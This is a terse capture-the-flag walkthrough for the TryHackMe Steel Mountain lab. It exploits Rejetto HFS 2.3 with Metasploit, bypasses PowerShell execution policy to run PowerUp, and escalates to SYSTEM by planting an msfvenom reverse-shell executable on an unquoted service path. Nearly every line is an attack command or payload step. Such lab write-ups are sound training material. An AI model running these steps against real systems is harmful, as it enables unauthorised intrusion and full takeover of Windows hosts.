Steel Mountain (TryHackMe box)

Scan with NMAP

It has HFS 2.3 which is vulnerable. What exploit?

searchsploit HttpFileServer 2.3

Metasploit:

msfconsole
search rejetto #result from searchsploit
use 0
set lhost tun0
set rhost victimMachine
set rport 8080
run

Meterpreter:

getuid
shell
whoami /priv
powershell -ep bypass

it hangs. How to fix:

We can use PowerUp but we have to edit it:

mousepad PowerUp.ps1 #it's in /tmp now
#add this to the very end on its own line
Invoke-AllChecks

Upload using meterpreter:

meterpreter > upload /tmp/PowerUp.ps1

Run PowerUp directly from shell:

shell
powershell -ep bypass .\PowerUp.ps1

We see that IObit has Unquoted Service Path

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Query the service:

sc query AdvancedSystemCareService9

We can stop the service so we can edit path and then restart after:

sc stop AdvancedSystemCareService9

Doing systeminfo tells us that it’s x64 arch so we can make a x64 executable with the same name as the exe we found:

Listener:

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 5555
run

make the exe:

cd /tmp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=5555 -f exe > ASCService.exe

In meterpreter navigate (how to deal with escaping):

cd c:\\
cd "program files (x86)"
pwd
cd IObit
cd "Advanced SystemCare"
pwd

Note: PWD are just checks to make sure we’re in the right spot

Move our executable to the machine:

upload /home/kali/transfer/ASCService.exe

start the service:

shell
sc start AdvancedSystemCareService9

Meterpreter:

getuid

NT Authority\System